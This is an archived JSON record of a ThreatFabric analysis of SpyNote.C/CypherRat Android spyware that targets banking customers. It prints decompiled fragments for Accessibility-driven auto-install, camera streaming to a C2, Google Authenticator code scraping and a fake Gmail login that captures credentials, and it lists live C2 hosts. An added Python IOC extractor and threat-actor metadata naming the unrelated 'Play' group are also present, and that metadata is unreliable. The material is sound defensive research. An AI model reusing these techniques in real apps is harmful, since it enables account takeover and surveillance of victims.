{
	"id": "aaaf1f76-65ee-4158-9ea9-883735e68368",
	"created_at": "2026-04-06T00:21:36.23311Z",
	"updated_at": "2026-04-10T03:30:32.770323Z",
	"deleted_at": null,
	"sha1_hash": "307247c0e54e0c18fcd38618870614fadffcf0ec",
	"title": "SpyNote: Spyware with RAT capabilities targeting Financial Institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1137170,
	"plain_text": "SpyNote: Spyware with RAT capabilities targeting Financial Institutions\r\nPublished: 2024-10-01 · Archived: 2026-04-05 23:02:35 UTC\r\nUncovering the Latest Developments in SpyNote\r\nAndroid spyware is one of the most common kinds of malware used by attackers to gain access to personal data and carry out fraud operations. Because it can track a user’s location, profile web browsing behaviour, and steal sensitive information such as passwords and credit card numbers, the threat that Android spyware poses to banking institutions and banking customers alike is comparable to that of Android banking malware.\r\nSpyware can also record phone calls, remotely manage the device, intercept SMS messages, and perform other tasks by using legitimate APIs and permissions that are intended to help users.\r\nIn the last quarter of 2022, ThreatFabric researchers observed a large increase in the volume of samples belonging to the SpyNote malware family. This family, also known as SpyMax, is a unique and effective spyware designed to secretly observe user activity on an Android device. SpyNote can monitor, manage, and modify the device’s resources and features, and also provides remote access capabilities.\r\nThis spyware family has evolved over time, adopting new methods and technologies. SpyNote has several distinct variants: the most recent one, SpyNote.C, is routinely tracked in day-to-day operations and makes up the majority of the spyware samples ThreatFabric has observed since October 2022.\r\nOne of the main differences between the first variants, SpyNote.A and SpyNote.B, and the latest one, SpyNote.C, is the campaign objective. 
SpyNote.C is the first variant to openly target banking applications, impersonating a large number of reputable financial institutions such as HSBC, Deutsche Bank, Kotak Bank and BurlaNubank, as well as well-known applications such as WhatsApp, Facebook and Google Play.\r\nIn addition, we also observed the attackers using more generic application masquerades, such as wallpaper apps, productivity apps, or gaming apps.\r\nThreatFabric researchers have identified that some of the apps classified as SpyNote.C are being developed by lone actors and promoted as CypherRat. In this article we discuss how developments in this actor’s project, which is advertised as both spyware and banking malware, are likely behind the surge in numbers that we observed in the last few months.\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 1 of 7\n\nOther SpyNote.C campaigns discovered while analysing this spyware family impersonated System Notifications and the Google Play Store. These campaigns ran alongside the ones mentioned above, and the one shown below shares the same hosts used as C2.\r\nSpyNote Alias CypherRat\r\nThe latest variant of this malware family, SpyNote.C, was further developed by its author and sold to individual actors through a Telegram channel under the name CypherRat.\r\nThe threat actor offered CypherRat for sale through the Sellix payment system, accepting cryptocurrency payments to hinder tracking. 
These sales ran from August 2021 until October 2022, accumulating more than 80 separate customers.\r\nIn October 2022, the source code was published as open source on GitHub, after a leak and a few scamming incidents on hacking forums in which actors impersonated the original threat actor to steal money from other criminals.\r\nFollowing the release of the source code, the number of samples increased significantly, as can be seen in the statistical view of ThreatFabric Intelligence data.\r\nThe numbers follow a clear upward trend, which allowed ThreatFabric to collect more than 1100 SpyNote/CypherRat samples since October 2022; this equals the number of samples that we saw from the first test version of this variant collected in 2020.\r\nDuring the course of our investigation, we discovered that the original creator had switched focus to a new spyware project, CraxsRat, a paid application with capabilities similar to the original project.\r\nOutstanding Capabilities means Exceptional Abilities\r\nWe were interested in the distinctive spyware capabilities of the SpyNote.C variant, which were identified in malicious financial apps with RAT capabilities during 2022. 
We have highlighted a few of these features, which can be used to exfiltrate and abuse PII from online banking customers.\r\nUsing the privileges requested in the screenshot below, this SpyNote variant can intercept SMS messages and calls, capture video and audio recordings, update itself, and even install new applications.\r\nThe most recent versions of SpyNote are not only powerful but also include a variety of anti-analysis measures, from simple string obfuscation to the use of commercial packers. This makes them much more difficult to analyse and a more potent tool for threat actors.\r\nBelow is a list of some of SpyNote’s standout features:\r\nAbility to use the Camera API to record video from the device’s camera and send it to the Command and Control (C&C) server\r\nGPS and network location tracking\r\nStealing social media credentials (Facebook and Google)\r\nUsing Accessibility (A11y) services to extract codes from Google Authenticator\r\nKeylogging powered by Accessibility services, to steal banking credentials\r\nAccessibility Service\r\nSpyNote uses Accessibility Services to make it difficult for users to uninstall the application, to install new versions, and to install other apps. 
Without any user input, SpyNote can click on the “install” and “update” buttons thanks to accessibility services. The decompiled handler below matches a button labelled “安装” (Chinese for “install”), “install” or “done” and performs ACTION_CLICK on it:\r\n// click 'install' button via A11y\r\nif (\"android.widget.Button\".equals(accessibilityNodeInfo0.getClassName())) {\r\n    String s = accessibilityNodeInfo0.getText().toString();\r\n    if (!TextUtils.isEmpty(s) && ((\"安装\".equals(s)) || (\"install\".equals(s.toLowerCase())) || (\"done\".equals(s.toLowerCase())))) {\r\n        accessibilityNodeInfo0.performAction(16); // 16 == AccessibilityNodeInfo.ACTION_CLICK\r\n        return true;\r\n    }\r\n}\r\nThis malware can access a device’s camera and stream video straight to its Command-and-Control (C&C) server, which is one of its most dangerous capabilities and can be used to extract PII from the infected device. It gives the attacker complete control of the device’s camera, enabling them to spy on the user with it.\r\n// open the camera index chosen by the operator\r\ncamera_stream.camera = Camera.open(Integer.valueOf(this.vul[0]).intValue());\r\n...\r\n// connect to the streaming endpoint (address elided in the excerpt) with a 60 s timeout\r\nInetSocketAddress inetSocketAddress0 = new ...;\r\ncamera_stream.socket.connect(inetSocketAddress0, 60000);\r\n...\r\nCamera.Parameters params = camera_stream.camera.getParameters();\r\ncamera_stream.camera.startPreview();\r\nGoogle Authenticator with A11y\r\nSpyNote leverages the Accessibility feature to obtain two-factor authentication (2FA) codes. These codes are used as an additional layer of security to access an account, and are often required for logging into websites, applications, and other services. 
By reading the on-screen content of the Google Authenticator app through the Accessibility API, SpyNote is able to bypass these security measures and gain access to an account without the user’s knowledge. The decompiled fragments below show the package filter, the walk over the view hierarchy, and the logging of the scraped label/code pairs:\r\n// only handle accessibility events coming from Google Authenticator\r\npackagename = \"com.google.android.apps.authenticator2\";\r\n// collect the ViewGroup nodes of the current screen\r\nIterator iterator0 = utils.findNodeWithClass(accessibilityEvent0.getSource(), \"android.view.ViewGroup\").iterator();\r\n...\r\n// concatenate the text of each child node (account labels and current codes) with '-' as separator\r\nAccessibilityNodeInfo accessibilityNodeInfo1 = accessibilityNodeInfo0.getChild(v);\r\ns1 = s1 + accessibilityNodeInfo1.getText().toString() + \"-\";\r\n...\r\n// split the buffer and log adjacent entries as a label/code pair for exfiltration\r\narr_s = s1.split(\"-\");\r\nshared.log(utils.ssss, \"Google Authenticator<\" + arr_s[v] + \"<\" + arr_s[v + 1].getBytes());\r\nSocial Media Credentials (Facebook and Google)\r\nSpyNote can also function as a social app credential stealer. It deceives users into entering their login details by launching a page with a custom layout that closely resembles well-known services such as Gmail and Facebook, much as a traditional overlay attack shows victims a bogus login page for their banking application.\r\nUpon a command from the attacker, the credentials and information captured by the page are sent to the attacker’s C&C server.\r\n// show the fake Gmail or Facebook layout\r\nsocial_creds.this.setContentView(0x7F070001); // layout:glogin\r\n// set callbacks to handle clicks\r\nsocial_creds.this.findViewById(0x7F050031).setOnClickListener(singimallisten); // id:sinbtn\r\nsocial_creds.this.findViewById(0x7F050023).setOnClickListener(lrnmor); // id:lrnmor\r\nsocial_creds.this.findViewById(0x7F050016).setOnClickListener(Recovergmal); // id:gmailforgtpass\r\n// callback to extract user and password\r\nthis.singimallisten = new View.OnClickListener() {\r\n    public void onClick(View view0) {\r\n        String usrgmail = ((EditText) social_creds.this.findViewById(0x7F050043)).getText().toString(); // id:usrgmail\r\n        String passgmal = 
((EditText) social_creds.this.findViewById(0x7F05002C)).getText().toString(); // id:passgmal\r\n        if (usrgmail.length() <= 3) {\r\n            cmd_receiver.showToast(\"Please Check Your Email/Password.\");\r\n            return;\r\n        }\r\n        if (passgmal.length() < 8) {\r\n            cmd_receiver.showToast(\"Password Must At least 8 characters.\");\r\n            return;\r\n        }\r\n        // queue \"Gmail<user<password\" for exfiltration to the C&C\r\n        shared.log(ddddd.ssss, \"Gmail<\" + usrgmail + \"<\" + passgmal.getBytes());\r\n        social_creds.this.done = true;\r\n        social_creds.this.finish();\r\n    }\r\n};\r\nThe harvested credentials are then sent to the C&C server hard-coded in the application once the attacker issues the command through the Accessibility service. The C&C host, port and key are stored as Base64-encoded strings; this is encoding rather than encryption, but it is enough to keep the host out of a naive strings search:\r\n// Identified host, port and key used for C&C communication\r\nstatic {\r\n    AccessibilityService.key = const.encryp(\"bW1tbTE=\"); // mmmm1\r\n    AccessibilityService.c = \"K\";\r\n    AccessibilityService.d = \"dGV4dA==\"; // text\r\n    AccessibilityService.e = \"ZGV2ZWxvcA==\"; // develop\r\n    AccessibilityService.host = \"YWRuYW5rYXJhMS5kZG5zLm5ldA==\"; // adnankara1.ddns.net\r\n    AccessibilityService.port = \"Nzc3MQ==\"; // 7771\r\n}\r\nSimilar code patterns were identified in all SpyNote.C related applications; the aggregated host, port and key strings observed across these financial-institution impersonations were tabulated in the original post, and the hosts and ports are reproduced in the appendix.\r\nOther common Capabilities\r\nSpyNote also adopts features common to other spyware by abusing legitimate APIs, such as tracking the location of the infected device via the “GPS” and “Network” providers through the “LocationManager” offered by the Android system. 
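The Base64 strings in the static block above decode with any standard library, so the host and port can be pulled out of a decompiled sample with a short script. The Python below is an added example written for this page; it is not code from the ThreatFabric post and not code from SpyNote or CypherRat. It assumes the decompiler emits assignments of the shape Class.field = wrapper(literal) or Class.field = literal with the literal in double quotes, as in the block quoted above; the embedded source text is constructed from the values printed there and is not a real sample. The script decodes every literal that is well-formed Base64 for printable ASCII, classifies the result as hostname, IP or port, and pairs hosts with ports into host:port indicators; literals that are not Base64 (such as the single-character c field) are kept raw rather than guessed at.

```python
import base64
import binascii
import ipaddress
import re

DQ = chr(34)  # the double-quote character, kept out of the listing itself

# Constructed test input modelled on the decompiled static initialiser quoted in the
# write-up (same Base64 values); it is not a real sample.
SAMPLE_SOURCE = '''
static {
    AccessibilityService.key = const.encryp(%(q)sbW1tbTE=%(q)s);
    AccessibilityService.c = %(q)sK%(q)s;
    AccessibilityService.d = %(q)sdGV4dA==%(q)s;
    AccessibilityService.e = %(q)sZGV2ZWxvcA==%(q)s;
    AccessibilityService.host = %(q)sYWRuYW5rYXJhMS5kZG5zLm5ldA==%(q)s;
    AccessibilityService.port = %(q)sNzc3MQ==%(q)s;
}
''' % {'q': DQ}

# Class.field = [wrapper(]literal[)] with the literal in double quotes
# (assumed decompiler output shape; the pattern avoids backslashes on purpose)
ASSIGN_RE = re.compile(
    r'([A-Za-z_][A-Za-z0-9_]*)[.]([A-Za-z_][A-Za-z0-9_]*)[ ]*=[ ]*'
    r'(?:[A-Za-z_][A-Za-z0-9_.]*[(])?'
    + DQ + r'([A-Za-z0-9+/=]+)' + DQ
)

# dotted hostname: one or more labels followed by an alphabetic top-level label
HOST_RE = re.compile(r'^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?[.])+[A-Za-z]{2,63}$')


def try_base64(token):
    '''Decode token if it is well-formed Base64 for printable ASCII; otherwise return None.'''
    if len(token) < 4 or len(token) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode('ascii')
    except UnicodeDecodeError:
        return None
    if not text or not all(32 <= ord(ch) < 127 for ch in text):
        return None
    return text


def classify(value):
    '''Label a decoded literal as ip, hostname, port or other.'''
    try:
        ipaddress.ip_address(value)
        return 'ip'
    except ValueError:
        pass
    if HOST_RE.match(value):
        return 'hostname'
    if value.isdigit() and 0 < int(value) < 65536:
        return 'port'
    return 'other'


def extract_config(source):
    '''Return {field: (value, kind)} for every quoted literal assigned to a static field.

    kind is ip, hostname, port or other when the literal decoded cleanly as Base64,
    and raw when it did not (the literal is then kept verbatim, not guessed at).
    '''
    found = {}
    for match in ASSIGN_RE.finditer(source):
        _cls, field, literal = match.groups()
        decoded = try_base64(literal)
        if decoded is None:
            found[field] = (literal, 'raw')
        else:
            found[field] = (decoded, classify(decoded))
    return found


def c2_iocs(config):
    '''Pair every recovered host or IP with every recovered port as host:port indicators.'''
    hosts = [v for v, kind in config.values() if kind in ('hostname', 'ip')]
    ports = [v for v, kind in config.values() if kind == 'port']
    return sorted(h + ':' + p for h in hosts for p in ports)


if __name__ == '__main__':
    cfg = extract_config(SAMPLE_SOURCE)
    for field, (value, kind) in cfg.items():
        print(field, kind, value, sep='  ')
    print('C2 candidates:', c2_iocs(cfg))
```

Run against real decompiler output (jadx or similar) the same pattern also picks up literals that happen to be valid Base64 but decode to unrelated text, which is why the classifier keeps the kind next to each value instead of treating every decoded string as an indicator; only the hostname/ip and port kinds are paired into C2 candidates.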
Similarly, it abuses MediaProjection to capture screen content.\r\nThese capabilities are not necessarily connected to banking fraud, but they offer criminals even more information on the victim.\r\nConclusion\r\nAs the Android spyware landscape evolves, mobile users are constantly confronted with new threats. We predict that SpyNote will keep using the Accessibility Service to collect essential data from users’ devices and will keep developing towards successful distribution. We also believe that the trend of adopting stronger self-protection measures, such as obfuscation and packers, will continue. It is very likely that different forks of SpyNote will keep appearing following the release of its source code.\r\nResearchers at ThreatFabric constantly monitor the mobile threat landscape, and by following various actors and campaigns we are able to recognise and capture malware that specifically targets financial institutions. 
This development is not yet common within the Android spyware ecosystem, but it is extremely dangerous and may mark the start of a new trend in which the distinction between spyware and banking malware gradually disappears, because of the power that abuse of Accessibility services gives to criminals.\r\nFinancial organisations are welcome to contact us: if you suspect an app of being involved in malicious activity, feel free to reach our Mobile Threat Intelligence team, which will provide additional details and help with reporting the malicious app if identified: mti@threatfabric.com.\r\nAppendix\r\nSpyNote Samples\r\nApp name | Package name | SHA-256\r\nHSBC UK Mobile Banking | com.employ.mb | 6f606bc5004af2b90b66d6e6e4f29f35a3b4a31dc6974b55434b3c53d70\r\nDeutsche Bank Mobile | com.reporting.efficiency | 114fa822d7a96169c9cd48303f7fbd1af94f57cb46fec576d91ccea11bc5\r\nBurlaNubank | com.appser.verapp | 34d70ce1e9eeafdc225abbfa84c24454986a47ca7a41431c38ca16e612d\r\nKotak Bank | splash.app.main | bd172dbb47a95e7abc3ce76118bf6cd3f742d7c932ec8801cd553509f31\r\nBank of America Confirmation | yps.eton.application | 2e1c68c3e785679c04d915eb2f960ef5e7ef3294a423e1835aa06e02548\r\nCypherRat | com.appser.verapp | 4779c469c50d157d2140d39fc9b034c931b5224e886bcb60024687fe40\r\nVirtual SimCard | cobi0jbpm.apvy8vjjvpser.verapchvvhbjbjq | a2a95cfccb8fbe557f605b8a47dad901d3a25f8cdae7f0beee133f60b924\r\nCurrent Activity | com.willme.topactivity | bade089b4dfdea057132551deb997ba8a25c4d1ced32f78975239c7324\r\nConversations_ | com.appser.verapp | bf4e003360cb2024dfaa46a79bf05f667d300f2bcd0765b9a12500201b9\r\n(The SHA-256 column is truncated in the archived copy; the values above are shorter than full 64-character digests and should be matched as prefixes only.)\r\nSpyNote C2s connected to Banking campaigns\r\nHost | Port\r\nbizebiz.myftp.org | 6378\r\nadnankara1.ddns.net | 7771\r\nsilent911-44688.portmap.io | 44688\r\n154.211.96.78 | 8088\r\n159.203.126.35 | 22526\r\nSource: 
https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions"
	],
	"report_names": [
		"spynote-rat-targeting-financial-institutions"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434896,
	"ts_updated_at": 1775791832,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.pdf",
		"text": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.txt",
		"img": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.jpg"
	}
}